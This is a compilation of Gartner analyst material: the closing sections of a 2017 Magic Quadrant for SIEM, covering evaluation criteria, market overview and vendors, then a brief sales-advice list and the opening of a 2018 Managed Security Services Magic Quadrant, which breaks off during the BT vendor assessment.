  • Market Responsiveness/Record evaluates the match of the SIEM offering to the functional requirements stated by buyers at acquisition time, and the vendor’s track record in delivering new functions when they are needed by the market. Also considered is how the vendor differentiates its offerings from those of its major competitors.
  • Marketing Execution evaluates the SIEM marketing message against our understanding of customer needs, and also evaluates any variations by industry vertical or geographic segments.
  • Customer Experience is an evaluation of product function and service experience within production environments. The evaluation includes ease of deployment, operation, administration, stability, scalability and vendor support capabilities. This criterion is assessed by conducting surveys of vendor-provided reference customers, in combination with feedback via inquiry, Peer Insights and other interactions from Gartner clients that are using or have completed competitive evaluations of the SIEM offering.
  • Operations is an evaluation of the organization’s service, support and sales capabilities, and includes an evaluation of these capabilities across multiple geographies.

Table 1.   Ability to Execute Evaluation Criteria

Evaluation Criteria            Weighting
Product or Service             High
Overall Viability              High
Sales Execution/Pricing        High
Market Responsiveness/Record   High
Marketing Execution            Medium
Customer Experience            High
Operations                     High

Source: Gartner (December 2017)

Completeness of Vision

  • Market Understanding evaluates the ability of the technology provider to understand current and emerging buyer needs and to translate those needs into products and services. SIEM vendors that show the highest degree of market understanding are adapting to customer requirements in areas such as early targeted attack and breach detection, and simplified implementation and operation, while also meeting compliance reporting requirements.
  • Marketing Strategy evaluates the vendor’s ability to effectively communicate the value and competitive differentiation of its SIEM offering.
  • Sales Strategy evaluates the vendor’s use of direct and indirect sales, marketing, service, and communications affiliates to extend the scope and depth of market reach.
  • Offering (Product) Strategy is an evaluation of the vendor’s approach to product development and delivery that emphasizes functionality and feature sets as they map to current requirements. Development plans during the next 12 to 18 months are also evaluated. Because the SIEM market is mature, there is little differentiation between most vendors in areas such as support for common network devices, security devices, OSs and consolidated administration capabilities. In this evaluation, we neutralized the relative evaluations of vendors with capabilities in these areas, but there would be a severe “vision penalty” (that is, a lower rating on the Completeness of Vision axis) for a vendor that has shortcomings in this area. We continue to place greater weight on current capabilities that aid in targeted attack detection, including:
    • Vendor capabilities for profiling and anomaly detection to complement existing rule-based correlation.
    • Threat intelligence and business context integration, including automated updates, filtering, and usage within rules, alerts and reports.
    • User monitoring capabilities, including monitoring of administrative policy changes and integration with IAM technologies, for automated import of access policy (user context) for use in monitoring. We also evaluate predefined analytics for user behavior analysis.
    • Data access monitoring capabilities, which include direct monitoring of database logs and integration with database audit and protection products, DLP integration, and FIM through native capability and integration with third-party products.
    • Application layer monitoring capabilities, including integration with third-party applications (for example, ERP financial and HR applications, and industry vertical applications), for the purpose of user activity and transaction monitoring at that layer; the external event source integration interface that is used to define normalizers and parsers for the log formats of an organization’s in-house-developed applications; and the ability to derive application context from external sources.
    • Analytics, an important capability to support the early detection of targeted attacks and breaches. SIEM vendors have long provided query capabilities against the primary storage tiers of SIEM technology. In order to be effective for early breach detection, the analytics capability must incorporate context about users, assets, threats and network activity, and must also provide query performance that supports an iterative approach to investigation. Some SIEM vendors have introduced separate data stores to hold very large amounts of security event, content and contextual data, optimized for applying advanced analytics. A number of SIEM vendors have also built connectors from the SIEM technology to industry-standard big data repositories.
    • Inclusion of advanced threat detection, endpoint and network traffic monitoring, and packet capture capabilities, and integration with third-party technologies that provide these functions for more effective early breach detection.
  • Despite the vendor focus on expansion of capability, we continue to heavily weight simplicity of deployment and ongoing support. Users, especially those with limited IT and security resources, still value this attribute over breadth of coverage beyond basic use cases. SIEM products are complex and tend to become more so as vendors extend capabilities. Vendors that are able to provide effective products that users can successfully deploy, configure and manage with limited resources will be the most successful in the market.
  • We evaluate options for co-managed or hybrid deployments of SIEM technology and supporting services because a growing number of Gartner clients are anticipating or requesting ongoing service support for monitoring or managing their SIEM technology deployments.
  • Vertical/Industry Strategy evaluates vendor strategies to support SIEM requirements that are specific to industry verticals.
  • Innovation evaluates the vendor’s development and delivery of SIEM technology that is differentiated from the competition in a way that uniquely meets critical customer requirements. Product capabilities and customer use in areas such as application layer monitoring, fraud detection and identity-oriented monitoring are evaluated, in addition to other capabilities that are product-specific and needed and deployed by customers. There is a strong weighting of capabilities that are needed for advanced threat detection and incident response: user, data and application monitoring, ad hoc queries, visualization, orchestration and incorporation of context to investigate incidents, and workflow/case management features. There is also an evaluation of capabilities for monitoring cloud environments.
  • For Geographic Strategy, although the North American and European markets produce the most SIEM revenue, Latin America and the Asia/Pacific region are growth markets for SIEM and are driven primarily by threat management and secondarily by compliance requirements. Our overall evaluation of vendors in this Magic Quadrant includes an evaluation of vendor sales and support strategies for those geographies.

Table 2.   Completeness of Vision Evaluation Criteria

Evaluation Criteria            Weighting
Market Understanding           High
Marketing Strategy             Medium
Sales Strategy                 Medium
Offering (Product) Strategy    High
Business Model                 Not Rated
Vertical/Industry Strategy     Medium
Innovation                     High
Geographic Strategy            Medium

Source: Gartner (December 2017)

Quadrant Descriptions

Leaders

The SIEM Leaders quadrant is composed of vendors that provide products that are a strong functional match to general market requirements, have been the most successful in building an installed base and revenue stream within the SIEM market, and have a relatively high viability rating (due to SIEM revenue or SIEM revenue in combination with revenue from other sources). In addition to providing technology that is a good match to current customer requirements, Leaders also show evidence of superior vision and execution for emerging and anticipated requirements. They typically have relatively high market share and/or strong revenue growth, and have demonstrated positive customer feedback for effective SIEM capabilities and related service and support.

Challengers

The Challengers quadrant is composed of vendors that have multiple product and/or service lines, at least a modest-size SIEM customer base, and products that meet a subset of the general market requirements. As the SIEM market continues to mature, the number of Challengers has dwindled. Vendors in this quadrant would typically have strong execution capabilities, as evidenced by financial resources, a significant sales and brand presence garnered from the company as a whole, or from other factors. However, Challengers have not demonstrated a complete set of SIEM capabilities or they lack the track record for competitive success with their SIEM technologies, compared with vendors in the Leaders quadrant.

Visionaries

The Visionaries quadrant is composed of vendors that provide products that are a strong functional match to general SIEM market requirements, but have a lower Ability to Execute rating than the Leaders. This lower rating is typically due to a smaller presence in the SIEM market than the Leaders, as measured by installed base or revenue size or growth, or by smaller overall company size or general viability.

Niche Players

The Niche Players quadrant is composed primarily of vendors that provide SIEM technology that is a good match to a specific SIEM use case or a subset of SIEM functional requirements. Niche Players focus on a particular segment of the client base (such as the midmarket, service providers, or a specific geographic region or industry vertical) or may provide a more limited set of SIEM capabilities. In addition, vendors in this quadrant may have a small installed base or be limited, according to Gartner’s criteria, by a number of factors. These factors may include limited investments or capabilities, a geographically limited footprint, or other inhibitors to providing a broader set of capabilities to enterprises now and during the 12-month planning horizon. Inclusion in this quadrant does not reflect negatively on the vendor’s value in more narrowly focused markets or use cases.

Context

SIEM technology provides:

  • SIM — Log management, analytics and compliance reporting
  • SEM — Real-time monitoring and incident management for security-related events from networks, security devices, systems and applications

SIEM technology is typically deployed to support three primary use cases:

  • Advanced threat detection — Monitoring, alerting in real time, and longer-term analysis and reporting of trends and behaviors regarding user activity, data access, and application activity. Threat detection includes incorporation of threat intelligence and business context, in combination with effective ad hoc query capabilities.
  • Basic security monitoring — Log management, compliance reporting and basic real-time monitoring of selected security controls.
  • Investigation and incident response — Dashboards and visualization capabilities, as well as workflow and documentation support to enable effective incident identification, investigation and response.

Organizations should define their specific functional and operational requirements, and consider SIEM products from vendors in every quadrant of this Magic Quadrant. Product selection decisions should be driven by organization-specific requirements in areas such as the relative importance of basic capabilities versus advanced features; budget constraints; the scale of the deployment; complexity of product (deploying, running, using and supporting); the IT organization’s project deployment and technology support capabilities; and integration with established applications, data monitoring and identity management infrastructure (see “Toolkit: Security Information and Event Management RFP”).

Security and risk management leaders considering SIEM deployments should first define the requirements for SEM and reporting. The requirements definition should include capabilities that will be needed for subsequent deployment phases. The project will benefit from the input of other groups, including audit/compliance, identity administration, IT operations and application owners (see “How to Deploy SIEM Technology”). Organizations should also describe their network and system deployment topology, and assess event rates, so that prospective SIEM vendors can propose solutions for company-specific deployment scenarios. The requirements definition effort should also include phased deployments and enhancements beyond the initial use cases. This Magic Quadrant evaluates technology providers with respect to the most common technology selection scenario — a SIEM project that is funded to satisfy a combination of threat monitoring/detection/response and compliance reporting requirements.

Market Overview

During the past year, demand for SIEM technology has remained strong. The SIEM market grew from $2.001 billion in 2015 to $2.167 billion in 2016 (see “Forecast: Information Security, Worldwide, 2015-2021, 3Q17 Update”). Threat management is now the primary driver, and general monitoring and compliance remains secondary. In North America, there continue to be many new deployments by organizations with limited security resources that need to improve monitoring and breach detection — often at the insistence of larger customers or business partners. Compliance reporting also continues as a requirement, but most discussions with Gartner clients are security-focused, and compliance reporting is regarded as “table stakes.” Demand for SIEM technology in Europe and the Asia/Pacific region remains steady, driven by a combination of threat management and compliance requirements. Growth rates in the less mature markets of the Asia/Pacific region and Latin America are much higher than those in the more mature North American and European markets. As a consequence, our overall evaluation of vendors in this Magic Quadrant includes an evaluation of vendor sales and support strategies for those geographies.

There continue to be new deployments by larger companies that are conservative adopters of technology. Large, late adopters and smaller organizations place high value on deployment and operational support simplicity. We continue to see large companies that are re-evaluating SIEM vendors to replace SIEM technology associated with incomplete, marginal or failed deployments.

The SIEM market is mature and very competitive. We are in a broad adoption phase, in which multiple vendors can meet the basic requirements of a typical customer. The greatest area of unmet need is effective detection of targeted attacks and breaches. Organizations are failing at early breach detection, with more than 80% of breaches undetected by the breached organization. The situation can be improved with threat intelligence, behavior profiling and effective analytics. SIEM vendors continue to increase their native support for behavior analysis capabilities as well as integrations with third-party technologies, and Gartner customers are increasingly expressing interest in developing use cases based on behavior.

SIEM deployments tend to grow in scope over a three-year period to include more use cases, and more event sources. As the number and complexity of use cases increases, there is typically greater demand for resources to run, tune and operate the SIEM, and to respond to incidents.

SIEM Vendor Landscape

The vendor landscape for SIEM is evolving, with several new entrants to the Magic Quadrant this year. Exabeam, FireEye, Rapid7, Securonix and Venustech have been added, as these vendors have added support for SIEM functions, and compete for SIEM budget with other vendors in the Magic Quadrant. Venustech is based in China, with aims of expansion into Europe. Exabeam and Securonix have added SIEM functionality to their previously UEBA-focused products, and FireEye has evolved to add SIEM as a service to its advanced threat detection platform. The SIEM market continues to be dominated by relatively few large vendors — Micro Focus (including the ArcSight and Sentinel SIEMs), IBM, McAfee (previously Intel Security) and Splunk — that command more than 60% of market revenue. Smaller SIEM vendors are typically focused on specific market segments, such as buyers of their other products, buyers seeking SIEM plus monitoring services, or MSSP or MSP providers.

Leading SIEM vendors continue to focus on targeted attack and breach detection through incorporation of threat intelligence, analytics, profiling and anomaly detection, and endpoint and network activity monitoring.

Leading SIEMs have integrations with big data platforms (the vendors’ own, where they have them, or open-source options like Hadoop). A number of vendors with in-house security research capabilities (IBM, McAfee, RSA and Trustwave) provide integration with proprietary threat intelligence content. Vendors that have both SIEM and MSSP businesses (EventTracker, IBM and Trustwave) are marketing co-managed SIEM technology deployments that include a range of monitoring services. Rapid7 and FireEye offer as-a-service SIEM.

Customers adopting SIEM solutions that have emerged from UEBA vendors need to plan for changes to the way analysts use the tools. The tools primarily emphasize a user-based approach to monitoring for threats, compared to traditional approaches of event-based monitoring oriented around IP addresses and hostnames. SIEM solutions delivered entirely on big data platforms are just emerging in the market, and buyers should consider the potential operational impacts and expertise requirements, as these platforms are more complex and newer than other SIEM solutions.

Several vendors are not included in the Magic Quadrant because of a specific vertical-market focus and/or SIEM revenue and competitive visibility levels:

  • Odyssey Consultants, based in Cyprus, and LogPoint, based in Denmark, offer SIEMs based on modern big data and analytics architectures, but currently have very limited visibility among Gartner customers.
  • FairWarning provides privacy breach detection and prevention solutions for the healthcare market that entail user activity and resource access monitoring at the application layer, and has expanded to include security monitoring for Salesforce.
  • Huntsman Security (part of Tier-3) is a SIEM vendor with a presence primarily in the U.K. and Australia. The Huntsman Enterprise SIEM can be augmented with modules to support behavioral anomaly detection and threat intelligence.
  • Lookwise (developed by S21sec) has a market presence primarily in Spain and South America. The distinguishing characteristic of Lookwise is the threat intelligence feeds from S21sec, which are focused on the banking and critical infrastructure sectors.
  • HelpSystems, with its Vityl product suite, provides operational event correlation, business process monitoring and SIEM solutions to customers in Europe and South America.

Customer Requirements — Security Monitoring and Compliance Reporting for Systems, Users, Data and Applications

Customers remain primarily focused on security use cases for SIEM, with compliance typically a secondary requirement. The security organization often wants to employ SIEM to improve capabilities for external and internal threat discovery and incident management (see “Use SIEM for Targeted Attack Detection”). As a consequence, there are requirements for user activity and resource access monitoring for host systems and applications (see “Effective Security Monitoring Requires Context”). In this year’s Magic Quadrant, we continue to place greater weight on capabilities that aid in targeted attack detection, including support for user activity monitoring, application activity monitoring, profiling and anomaly detection, threat intelligence, and effective analytics, as well as on incident response features.

The ongoing consideration of SIEM technology by companies with limited security resources results in demand for products that are easy to deploy and manage, and that provide security monitoring content such as correlation rules, queries, dashboards, reports and threat feeds that support basic security monitoring and compliance reporting functions.

SIEM solutions should:

  • Support the real-time collection and analysis of events from host systems, security devices and network devices, combined with contextual information for threats, users, assets and data.
  • Provide long-term event and context data storage and analytics.
  • Provide predefined functions that can be lightly customized to meet company-specific requirements.
  • Be as easy as possible to deploy and maintain.

Scalability

Scalability is a major consideration in SIEM deployments. For a SIEM technology to meet the requirements for a given deployment, it must be able to collect, process, normalize, store and analyze all security-relevant events and other context-relevant data. Minimal latency is necessary for real-time correlation and alerting. Event processing includes parsing, filtering, aggregation, correlation, enrichment, alerting, display, indexing and writing to the data store. Scalability also includes access to the data for analytics and reporting — even during peak event periods — with ad hoc query response times that enable an iterative approach for incident investigation. Behavioral analytics require the collection and analysis of data over longer time periods than typically used for real-time alerting. We characterize the size of a deployment based on three principal factors:

  • The number of event sources
  • The sustained events collected per second
  • The size of the event data store

We assume a mix of event sources that are dominated by servers, but also include firewalls, intrusion detection sensors and network devices. The boundaries for small, midsize and large deployments are not absolute, because some deployments may have a large number of relatively quiet event sources, while others will have a smaller number of very busy event sources. For example, a deployment with several busy log sources may exceed the EPS boundary for a small deployment, but will still be small architecturally.

Gartner defines a small deployment as one with 300 or fewer event sources, a sustained EPS rate of 1,500 EPS or less, and a back store sized at 800GB or less. Gartner defines a midsize deployment as one with 400 to 800 event sources, a sustained event rate of 2,000 to 7,000 EPS and a back store of 4TB to 8TB. A large deployment is defined as one with more than 900 event sources, a sustained event rate of more than 15,000 EPS, and a back store of 10TB or more. Some very large deployments have many thousands of event sources, sustained event rates of more than 25,000 EPS and a back store of more than 50TB. We may indicate that a vendor’s SIEM technology is better suited for a small, midsize or large deployment, which means that size is the typical or most common successful deployment for that vendor. Every vendor will have outliers.

SIEM Services

Gartner customers increasingly indicate that they are seeking external service support for their SIEM deployment, or are planning to acquire that support in conjunction with a SIEM product (see “How and When to Use Co-managed SIEM”). Motivation to seek external services includes lack of internal resources to manage a SIEM deployment, lack of resources to perform real-time alert monitoring, or lack of expertise to expand the deployment to include new use cases (such as those for advanced threat detection). We expect that demand by SIEM users for such services will grow, driven by more customers adopting 24/7 monitoring requirements and implementing use cases that require deeper SIEM operational and analytics expertise.

SIEM vendors may support these needs via managed services with their own staff or outsourcing services, or using partners. SIEM offered as a service includes the maintenance of the platform by the vendor, with customers using their own resources (or other service providers) to configure content and monitor and investigate events. Managed security service providers, which offer real-time monitoring and analysis of events, and collect logs for reporting and investigation, are another option for SIEM users (see “Innovation Insight for SIEM as a Service”). For basic use cases, severely resource-constrained customers may opt for SaaS-type log management services from Loggly, Sumo Logic or others that have some security utility, but also cover operational use cases. Customer-specific requirements for event collection and storage, alerting, investigation, and reporting may prove problematic for external service providers, and SIEM users exploring services should evaluate the fit of the service provider to meet current and planned use cases.

SIEM Alternatives

The complexity and cost of SIEM, as well as emerging security analytics technologies, have driven interest in alternative approaches to collecting and analyzing event data to identify advanced attacks. The combination of Elasticsearch, Logstash and Kibana (also known as the ELK stack or Elastic Stack); Apache Spot; Apache Metron; and other tools leveraged with or natively using big data platforms like Hadoop offer data collection, management and analytics capabilities. Organizations with sufficient resources to deploy and manage these, and to develop and maintain analytics to address security use cases, may be able to get a solution that addresses a sufficient number of their requirements for a lower cost compared with commercial technologies. Gartner continues to track the development of this approach, and there is some feedback from customers that the workload involved in engineering these solutions to scale, and the development effort to support the required event sources and analysis, is significant, despite the software itself being free. This may negate the objective of being less expensive than a commercial SIEM deployment.

Organizations that lack the resources and process maturity for SIEM deployment and support, and that cannot or choose not to engage an MSSP for monitoring, can meet basic logging and review requirements with log management technologies (or services) such as Graylog or Sumo Logic with no, or very limited, security use cases supported out of the box (see “Use Central Log Management for Security Event Monitoring Use Cases”).

There are a number of providers offering managed detection and response (MDR) services that differ from those of MSSPs, with the goal of identifying and responding to advanced threats in the customer environment — typically through the analysis of selected network and endpoint data (see “Market Guide for Managed Detection and Response Services”). The scope of services and event sources is typically smaller than those available from an MSSP, or covered by a SIEM deployment. As such, they do not typically compete directly against the SIEM vendor or MSSP, where customers have broader use-case requirements. However, the MDR services claim effective advanced threat detection capabilities, and may compete for SIEM budget in organizations with sufficient resources to support those use cases. Gartner will continue to monitor the space to assess how MSS, MDR, logging and SIEM interact and intersect.

Evidence

Sources of information to support this analysis include feedback from Gartner customers gathered through inquiry calls, face-to-face meetings and survey/polling tools; vendor information supplied in response to a survey, product demonstration and briefings; and vendor reference opinions gathered via polling tool.

Evaluation Criteria Definitions

Ability to Execute

Product/Service: Core goods and services offered by the vendor for the defined market. This includes current product/service capabilities, quality, feature sets, skills and so on, whether offered natively or through OEM agreements/partnerships as defined in the market definition and detailed in the subcriteria.

Overall Viability: Viability includes an assessment of the overall organization’s financial health, the financial and practical success of the business unit, and the likelihood that the individual business unit will continue investing in the product, will continue offering the product and will advance the state of the art within the organization’s portfolio of products.

Sales Execution/Pricing: The vendor’s capabilities in all presales activities and the structure that supports them. This includes deal management, pricing and negotiation, presales support, and the overall effectiveness of the sales channel.

Market Responsiveness/Record: Ability to respond, change direction, be flexible and achieve competitive success as opportunities develop, competitors act, customer needs evolve and market dynamics change. This criterion also considers the vendor’s history of responsiveness.

Marketing Execution: The clarity, quality, creativity and efficacy of programs designed to deliver the organization’s message to influence the market, promote the brand and business, increase awareness of the products, and establish a positive identification with the product/brand and organization in the minds of buyers. This “mind share” can be driven by a combination of publicity, promotional initiatives, thought leadership, word of mouth and sales activities.

Customer Experience: Relationships, products and services/programs that enable clients to be successful with the products evaluated. Specifically, this includes the ways customers receive technical support or account support. This can also include ancillary tools, customer support programs (and the quality thereof), availability of user groups, service-level agreements and so on.

Operations: The ability of the organization to meet its goals and commitments. Factors include the quality of the organizational structure, including skills, experiences, programs, systems and other vehicles that enable the organization to operate effectively and efficiently on an ongoing basis.

Completeness of Vision

Market Understanding: Ability of the vendor to understand buyers’ wants and needs and to translate those into products and services. Vendors that show the highest degree of vision listen to and understand buyers’ wants and needs, and can shape or enhance those with their added vision.

Marketing Strategy: A clear, differentiated set of messages consistently communicated throughout the organization and externalized through the website, advertising, customer programs and positioning statements.

Sales Strategy: The strategy for selling products that uses the appropriate network of direct and indirect sales, marketing, service, and communication affiliates that extend the scope and depth of market reach, skills, expertise, technologies, services and the customer base.

Offering (Product) Strategy: The vendor’s approach to product development and delivery that emphasizes differentiation, functionality, methodology and feature sets as they map to current and future requirements.

Business Model: The soundness and logic of the vendor’s underlying business proposition.

Vertical/Industry Strategy: The vendor’s strategy to direct resources, skills and offerings to meet the specific needs of individual market segments, including vertical markets.

Innovation: Direct, related, complementary and synergistic layouts of resources, expertise or capital for investment, consolidation, defensive or pre-emptive purposes.

Geographic Strategy: The vendor’s strategy to direct resources, skills and offerings to meet the specific needs of geographies outside the “home” or native geography, either directly or through partners, channels and subsidiaries as appropriate for that geography and market.

What buyers want from a Trusted Advisor. (That is not you, sales person; it’s the presales guy.)

  1. Educated me with new ideas or perspectives
  2. Collaborated with me
  3. Persuaded me we would achieve results
  4. Listened to me
  5. Understood my needs
  6. Helped me avoid potential pitfalls
  7. Crafted a compelling solution
  8. Depicted purchasing process accurately
  9. Connected with me personally
  10. Overall value from the company is superior to other options

Magic Quadrant for Managed Security Services, Worldwide

Published: 27 February 2018 ID: G00325535

Analyst(s):

Summary

Security and risk management leaders interested in managed security services for threat detection, security technology management and compliance concerns should use this Magic Quadrant to help identify and evaluate providers with the ability to deliver services globally.

Market Definition/Description

Gartner defines managed security services (MSSs) as “the remote monitoring of security events and security-related data sources, or the management of IT security technology along with security event monitoring, delivered via shared services from remote security operations centers (SOCs), not through personnel on-site nor remote services delivered on a one-to-one basis to a single customer.”

Managed security service providers’ (MSSPs’) portfolios typically include the following services:

  • Security event monitoring only, or security event monitoring along with device/agent monitoring and management, primarily in the following categories:
    • Firewalls
    • Network-based threat detection technologies, such as network intrusion detection/prevention systems (IDPS)
    • Multifunction firewalls, or unified threat management (UTM) technology
    • Security gateways for messaging or web traffic
    • Web application firewalls
    • Endpoint protection platforms (EPPs), host intrusion detection/prevention systems (HIDS/HIPS) and endpoint detection and response (EDR)
  • Security analysis and reporting of events collected from IT infrastructure and application logs
  • Reporting for service management, regulatory compliance requirements and threat detection purposes
  • Management and monitoring, or monitoring only of advanced threat defense technologies, or the provision of those capabilities as a service
  • Vulnerability scanning delivered as a service
  • Management and monitoring of customer-deployed security information and event management (SIEM) technologies
  • Incident response services (both remote and on-site)

Services, such as the ones listed below, may also be part of MSS offerings, but are not common across all providers:

  • Distributed denial of service (DDoS) protection
  • Advanced threat intelligence services (e.g., dark web monitoring)
  • Secure messaging gateways, secure web gateways and web application firewalls delivered “as a service”
  • Managed vulnerability management (e.g., end-to-end management that includes scanning, prioritization and patching on behalf of the customer)
  • Identity and access management

This Magic Quadrant evaluation primarily focuses on the services for monitored, and managed and monitored, network security devices, host-based agents, and log event analysis and reporting services for other sources required by the buyer. These functions make up the core of MSS procurements.

There are no vendors appearing in the Visionaries quadrant of this Magic Quadrant. MSS is a mature market with a core set of services that appear in most MSS engagements.

Magic Quadrant

Figure 1. Magic Quadrant for Managed Security Services, Worldwide

Research image courtesy of Gartner, Inc.

Source: Gartner (February 2018)

Vendor Strengths and Cautions

AT&T

AT&T is a global telecommunications and IT services provider that offers a range of security device management and monitoring services for large enterprises, midsize businesses and governments. Headquartered in the U.S. (Dallas), and with regional offices in the U.K. (London) and Hong Kong, AT&T delivers services from five 24/7 SOCs (one Europe-based, one Asia/Pacific-based and three U.S.-based) and three SOCs operating local business hours (one in the Asia/Pacific region, one in Brazil and another in Europe). Customers served by an SOC operating local business hours and seeking after-hours support are routed to a 24/7 location with local language support. AT&T Threat Manager is its security event monitoring and management service, which is priced by events per day (EPD). Threat correlation and analysis is performed via the AT&T Threat Intellect platform, which leverages both commercial SIEM technologies and big data technologies and analytics, and is delivered to customers as part of AT&T’s Threat Management and Intelligence solutions. Device management is available through discrete managed security offerings for network security, data and application security, and mobile and endpoint security. Device management and workflow is handled through the AT&T Business Center portal, which also provides access to the Threat Manager view. The vendor offers threat intelligence via the AT&T Internet Protect service. AT&T supports in-country/customer premises data management in all regions, and can use local partners for device management to meet data residency requirements.

AT&T should be considered by organizations with a preference for services to be sourced from a single supplier, particularly managed network services and IT infrastructure security controls that need to be deployed, managed and monitored across the customer’s environment (both on-premises and cloud services) and the provider’s environment.

STRENGTHS
  • AT&T provides a wide scope of security-focused managed and monitoring services, with a strength in network-based security solutions. The security portfolio complements its managed network infrastructure and service offerings.
  • AT&T provides an integrated business portal where customers can access a variety of services, including accessing the Threat Manager portal along with portals for device management and vulnerability management services. The Threat Manager portal provides a strong user experience for both analysts and management personas, including customized dashboards, a risk trend feature and case management.
  • AT&T has moderate visibility with Gartner clients considering discrete MSSs.
CAUTIONS
  • AT&T provides support for Amazon Web Services (AWS) environment monitoring, but lacks support for Microsoft Azure and supports only a limited set of SaaS providers (e.g., Office 365, Box and Salesforce). Cloud access security broker (CASB) support is limited to SkyHigh Networks. Buyers should confirm support for their preferred SaaS vendors and other CASB vendors.
  • Customers wanting to leverage advanced threat detection technologies should confirm AT&T’s ability to monitor, and manage, preferred solutions as required, through either standard or custom delivery. AT&T has introduced a network-based forensic service that is only available to U.S. customers at this time due to data privacy restrictions. Customers outside the U.S. that are interested in this service should confirm future availability.
  • AT&T’s MSS business is most visible in the North American market, with lower visibility in Europe and little in the Asia/Pacific market. Buyers requiring a strong presence in the Asia/Pacific region should closely evaluate AT&T’s coverage there.

Atos

Atos is a global IT, digital service and software company with headquarters near Paris and regional offices in the U.S. (Purchase, New York) and Singapore. In addition to the vendor’s MSSs under the Cyber Security Services business, Atos provides a wide range of consulting, system integration, managed IT services and other offerings. Atos’ MSSs are delivered through a network of 14 24/7 SOCs (three in the U.K., six in continental Europe, two in the U.S., two in India and one in Malaysia). Atos recently acquired Anthelio Healthcare Solutions, providing capabilities in the Internet of Things (IoT)/OT space for managing privacy and compliance risks in the North American market. Atos provides threat intelligence and vulnerability notifications to customers using tools and services from partners like McAfee and Tripwire. Atos offers incident response and remediation activities as part of its core services in the form of forensic analysis and custom malware analysis, as well as offering optional threat hunting services and EDR leveraging CrowdStrike, for example. Advanced threat detection and monitoring services are available as part of Atos’ Prescriptive Security SOC offering, which leverages Atos’ proprietary big data analytics solution (Atos Codex) as well as technologies like user and entity behavior analytics (UEBA). In addition, IT/OT/IoT SOC services are developed and delivered together with Siemens.

Atos’ existing IT services customers and European-headquartered organizations with global coverage requirements that want a provider that can deliver end-to-end security management and monitoring services should consider the vendor for MSSs.

STRENGTHS
  • Customers requiring advanced analytics capabilities can opt for Atos’ flexible options leveraging Atos Codex, leading UEBA technologies or both.
  • Atos has a range of experience in securing transformational digital business projects within large enterprises, driven by its wider range of IT services engagements.
  • Atos supports customers that require end-to-end security management, monitoring and response, and offers standardized and customized solutions.
  • Atos partners with leading security technology vendors in areas such as network traffic analytics, endpoint protection, EDR, DDoS mitigation and encryption.
CAUTIONS
  • Atos Codex is currently only available to customers that opt for a dedicated McAfee SIEM platform. Atos indicates that adding Codex to the shared platform is on its roadmap. Customers that plan to leverage their shared SIEM platform and want advanced analytics capabilities should confirm availability.
  • Atos’ MSS portal is oriented toward reporting and dashboards to communicate information to customers, and provides limited support for bidirectional customer interaction.
  • Atos can monitor SaaS vendors supported within the McAfee Enterprise Security Manager (ESM) solution. Buyers should confirm support for monitoring of their preferred SaaS vendors and CASB solutions.
  • Atos is rarely mentioned by Gartner clients interested in stand-alone MSS engagements.

BAE Systems

BAE Systems, headquartered in Farnborough, U.K., offers a range of products and services in areas such as national defense, financial services and cybersecurity to industry and governments. The MSS group is headquartered in Guildford, U.K., with key offices in New York City, Dubai, Singapore and Sydney. Its offerings include Security Event Monitoring (SEM), Complete Security Monitoring (CSM), Managed Detection and Response (MDR), and Security Device Management (SDM). Services are delivered using five 24/7 SOCs — one in the U.K., three in the U.S. and one in the Philippines. Data residency requirements are typically met by retaining data locally and in geospecific cloud infrastructure. In the Asia/Pacific region, a local partner delivers services, and cloud storage is not yet available. The BAE analytics platform uses a combination of commercial SIEM technologies and a Hadoop-based big data and analytics platform. BAE supports common IaaS and security-as-a-service vendors such as Amazon CloudFront, AWS CloudTrail, Symantec.cloud, Cisco ScanSafe and Proofpoint. On-site and remote incident and breach response services are available via retainer.

BAE Systems has a customer base in EMEA of large enterprise businesses, primarily leveraging its CSM and MDR services, and a large small or midsize business (SMB) customer base in North America, primarily leveraging its NSM and SDM services. The vendor delivers its MSS offering using a combination of proprietary and commercial solutions, depending on the customer’s region and based on data privacy or residency requirements.

Companies in the financial services, legal, healthcare, media, critical infrastructure and defense markets that need a range of security monitoring, device management and advanced threat defense solutions should consider BAE Systems.

STRENGTHS
  • Advanced detection capabilities are supported by proprietary BAE Systems technology with its passive Network Probe Sensor and EDR agent. Customers that have not deployed commercial technologies for these functions can have these capabilities provided as a service.
  • BAE Systems’ MSS is augmented by a range of incident response services, including response and threat containment capabilities that are built into the MSS relationship, retainer-based response contracts, and incident response program development services.
  • Customer marks on BAE Systems’ threat detection capabilities are above average.
CAUTIONS
  • Most BAE Systems customers are in North America, with a small number in the Europe and Asia/Pacific regions. In the Asia/Pacific region, a partner delivers services for customers that require local data storage. Prospective customers with data residence or service delivery requirements specific to the Asia/Pacific region should validate the availability of services from BAE Systems.
  • The MSS portal offers limited reporting capabilities and management of vulnerability scans compared to those of leading competitors. Threat intelligence is provided through a separate portal.
  • SaaS monitoring is limited to Office 365. There are no MSS integrations with CASB solutions. BAE Systems indicates that support for CASB vendors is on its roadmap.

BT

BT is headquartered in London with key offices globally, including London, Hong Kong and Dallas. BT has six European SOCs and four Asia/Pacific region SOCs providing 24/7 service, with an additional four non-24/7 SOCs worldwide. BT provides a range of telecommunications, cloud-enabled hosting, cloud brokering and integration, and collaboration services, in addition to managed security services. BT’s MSS offerings have been under the BT Security brand name since 1Q17. BT Security’s MSS portfolio includes a range of offerings primarily within the Managed Security Services and Security Intelligence portfolios. Security Intelligence includes services such as Security Log Management (SLM), Security Threat Monitoring (STM), Cyber Security and Security Threat Intelligence. Technology management is under Managed Security Services and includes managed firewalls, DDoS, web, email, PKI and cloud security. Additional offerings include Security Vulnerability Scanning (SVS) for managed vulnerability scanning and Managed SIEM for McAfee ESM, LogRhythm and IBM QRadar customers. BT’s strategy for managed security services is evolving to emphasize its Managed SIEM and Cyber Security Platform offerings for existing BT customers and global enterprise buyers that require more one-to-one-oriented services, as opposed to delivery using a shared analytics platform that this research primarily assesses. BT has two separate portals for security technology management (Security Hub) and monitoring services (Security Threat Monitoring), which BT has been revamping over the last 12 months. Consulting services are available to meet a variety of customer demands. Incident response support, available as a retainer, is delivered in partnership with FireEye-Mandiant and other firms. BT can meet requirements for data residency with in-region/in-country service provision and citizenship requirements for SOC staff.

Global enterprises seeking global MSS capabilities to satisfy complex security requirements should consider BT.

STRENGTHS
  • BT can support customers that require integrated cloud services (hosting and/or brokering) and MSSs, especially security threat monitoring.
  • BT has many partnerships with security technology and service vendors that are leveraged to provide broad support for device management, as well as threat monitoring services. Customers requiring custom solutions will also benefit from these partnerships.
  • Customers give BT above-average marks for overall service satisfaction.
CAUTIONS
